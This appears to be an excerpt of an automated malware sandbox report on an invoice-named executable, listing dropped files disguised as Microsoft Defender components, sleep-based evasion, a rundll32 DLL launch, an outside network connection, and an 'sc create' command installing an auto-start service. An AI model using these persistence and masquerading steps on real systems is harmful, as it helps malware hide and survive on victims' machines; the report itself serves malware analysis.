          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\pt-BR\OfflineScannerShell.exe.muiJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\ConfigSecurityPolicy.exeJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\shellext.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\NisSrv.exeJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\AMMonitoringProvider.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe TID: 5768Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe TID: 3808Thread sleep count: 1871 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe TID: 5744Thread sleep count: 1519 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe TID: 6548Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exe TID: 4916Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\svchost.exe TID: 6676Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\System32\svchost.exe TID: 6676Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041ED3E4 FindFirstFileW,FindClose,7_2_041ED3E4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041ECE18 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,7_2_041ECE18
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0463D3E4 FindFirstFileW,FindClose,11_2_0463D3E4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04654D5C FindFirstFileW,FindClose,11_2_04654D5C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0463CE18 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,11_2_0463CE18
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04652D1C GetLogicalDriveStringsW,QueryDosDeviceW,11_2_04652D1C
          Source: C:\Users\user\Desktop\WKYC506_2389030007-00901003007010_777380775_#U00b2.exeCode function: 0_2_002B9ED6 VirtualQuery,GetSystemInfo,0_2_002B9ED6
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: svchost.exe, 00000004.00000002.3305962459.0000020471A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3306491284.0000020476E57000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3505654355.0000000002E16000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3505654355.0000000002DBD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_7-9462
          Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_11-13877
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 52.95.163.114 443Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0484A074 ShellExecuteW,11_2_0484A074
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess created: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exe "C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exe" --squirrel-firstrunJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" "C:\Users\user\AppData\Local\Extra\app-1.0.0\diskres2.dll" Tower2Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= autoJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto
          Source: rundll32.exe, 00000007.00000002.3506614439.00000000046A1000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Program Managerw
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041E7B44 cpuid 7_2_041E7B44
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,7_2_041ED51C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,7_2_041EC9BC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,11_2_0463D51C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,11_2_0463C9BC
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeQueries volume information: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ComponentModel.DataAnnotations\v4.0_4.0.0.0__31bf3856ad364e35\System.ComponentModel.DataAnnotations.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemXml\v4.0_4.0.0.0__b77a5c561934e089\PresentationFramework-SystemXml.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationProvider\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationProvider.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
